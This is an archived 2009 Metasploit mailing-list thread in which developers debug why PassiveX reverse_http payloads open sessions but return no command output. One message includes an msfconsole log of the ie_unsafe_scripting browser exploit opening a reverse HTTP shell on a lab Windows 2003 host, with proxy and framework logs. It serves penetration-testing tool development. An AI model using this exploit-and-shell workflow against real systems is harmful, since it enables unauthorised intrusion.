Metasploit mailing list archives

No subject

From: bogus () does not exist com ()
Date: Thu, 26 Mar 2009 15:46:02 -0000

currently breaks if DEP is enabled, so at some point we need to switch
passivex to use the same dll loading method as meterpreter's stefen
fewer's patches, but for now at least reverse_http is working again.

N

On Thu, Apr 16, 2009 at 8:29 AM, Bogdan <bogdan at generalconsult.ro> wrote:

I think the problem is with all the PassiveX payloads, not only meterpret=

er.

I tried windows/shell/reverse_http and windows/meterpreter/reverse_http.
The packet capture that you mention, I posted it.
Compared to the earlier revision used in the post with the packet capture=

now the error has moved to lib/msf/core/handler/passivex.rb in class
PxSessionChannel at the flush_output function.
I am looking in the code to see why it throws an exception, but I am new =

to

ruby and it might take a while.

Nathan Keltner wrote:


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

A couple of weeks ago someone pasted in details from a packet capture
where you could see the output of commands being run being sent back
from the meterpreter server (running on the target).

I still haven't had time to play with this yet, but if that is the case,
then this is likely a bug introduced by some of the recent meterpreter
updates (maybe Stephen Fewer's patches accidentally broke something).

If you want to take a look at it, try reverting to a version of SVN
before r6347 and giving it another go.

- -N

Bogdan wrote:


I have tried debugging the PassiveX payload. Here are the details:
metasploit from svn rev 6488 (updated Apr 16 2009).
I used the ie_unsafe_scripting exploit for testing.
Loglevel was set to 3.
The target was Internet Explorer 6 running on Windows 2003 SP2.

The payload was windows/shell/reverse_http

msf exploit(ie_unsafe_scripting) > exploit
[*] Exploit running as background job.
msf exploit(ie_unsafe_scripting) >
[*] PassiveX listener started.
[*] Using URL: http://172.16.52.179:8080/testuri
[*] Server started.
[*] Request received from 172.16.52.179:52559...
[*] Encoding payload into vbs/javascript/html...
[*] Sending exploit html/javascript to 172.16.52.179:52559...
[*] Exe will be uVKua.exe and must be manually removed from the %TEMP%
directory on the target.
[*] Sending PassiveX main page to client
[*] Command shell session 1 opened (Local Pipe -> Remote Pipe)
[*] Sending stage to sid 1 (474 bytes)

msf exploit(ie_unsafe_scripting) > sessions -l

Active sessions
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

=A0Id =A0Description =A0 =A0Tunnel
=A0-- =A0----------- =A0 =A0------
=A01 =A0 Command shell =A0Local Pipe -> Remote Pipe

msf exploit(ie_unsafe_scripting) > sessions -i 1
[*] Starting interaction with 1...


dir
^Z
Background session 1? [y/N] =A0y

The exploit succedes and it creates a session, but when interracting
with it, there is no output to the commands.


Here are the lines from squid proxy logs:
1239876195.772 =A0 4561 172.16.107.174 TCP_MISS/200 1092068 GET
http://172.16.52.179:8080/testuri - DIRECT/172.16.52.179 text/html
1239876197.247 =A0 =A0224 172.16.107.174 TCP_MISS/200 2693 GET
http://172.16.52.179:8081/testpx - DIRECT/172.16.52.179 text/html
1239876197.753 =A0 =A0206 172.16.107.174 TCP_MISS/200 699 GET
http://172.16.52.179:8081/testpx/stage - DIRECT/172.16.52.179 -
1239876201.913 =A0 4151 172.16.107.174 TCP_MISS/000 0 GET
http://172.16.52.179:8081/testpx/tunnel_out - DIRECT/172.16.52.179 -

As you can see the request for tunnel_out returns 0 bytes.


Here are the lines from framewok.log:
[04/16/2009 13:03:00] [d(2)] core: PassiveX listener started on
http://172.16.52.179:8081/testpx
[04/16/2009 13:03:40] [d(3)] core:
PassiveX:#<Msf::Handler::PassiveX::PxSessionChannel:0xf6b027b8> Queuing
1 to remote side
[04/16/2009 13:03:40] [d(3)] core:
PassiveX:#<Msf::Handler::PassiveX::PxSessionChannel:0xf6b027b8> Flushin=

remote output queue at 1 bytes
[04/16/2009 13:03:40] [d(0)] core:
PassiveX:#<Msf::Handler::PassiveX::PxSessionChannel:0xf6b027b8>
Exception during remote queue flush: closed stream
[04/16/2009 13:03:41] [d(3)] core:
PassiveX:#<Msf::Handler::PassiveX::PxSessionChannel:0xf6b027b8> Flushin=

remote output queue at 1 bytes
[04/16/2009 13:03:41] [d(0)] core:
PassiveX:#<Msf::Handler::PassiveX::PxSessionChannel:0xf6b027b8>
Exception during remote queue flush: closed stream
[04/16/2009 13:03:51] [d(3)] core:
PassiveX:#<Msf::Handler::PassiveX::PxSessionChannel:0xf6b027b8> Queuing
4 to remote side
[04/16/2009 13:03:51] [d(3)] core:
PassiveX:#<Msf::Handler::PassiveX::PxSessionChannel:0xf6b027b8> Flushin=

remote output queue at 5 bytes
[04/16/2009 13:03:51] [d(0)] core:
PassiveX:#<Msf::Handler::PassiveX::PxSessionChannel:0xf6b027b8>
Exception during remote queue flush: closed stream
[04/16/2009 13:03:53] [d(3)] core:
PassiveX:#<Msf::Handler::PassiveX::PxSessionChannel:0xf6b027b8> Flushin=

remote output queue at 5 bytes
[04/16/2009 13:03:53] [d(0)] core:
PassiveX:#<Msf::Handler::PassiveX::PxSessionChannel:0xf6b027b8>
Exception during remote queue flush: closed stream


I will try examining the source code to find the source of the problem.
Is anyone else using the PassiveX payloads with any success? If so let
us know.
I think the PassiveX payloads are very important because, as far as I
know, there are the only way to test a network located behind a proxy
server from the outside.

Bogdan

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.10-svn4880 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAknnIfMACgkQMQXR8VhB1pYRegCeM+m999vYkbRbOTWX4wnOwYMp
nREAniWXoCYanI+vOy2aFo7tAdxcoMHB
=3DiKBy
-----END PGP SIGNATURE-----

Current thread:

No subject, (continued)
- No subject (Mar 26)
- No subject (Mar 26)
- No subject (Mar 26)
- No subject (Mar 26)
- No subject (Mar 26)
- No subject (Mar 26)
- No subject (Mar 26)
- No subject (Mar 26)
- No subject (Mar 26)
- No subject (Mar 26)
- No subject (Mar 26)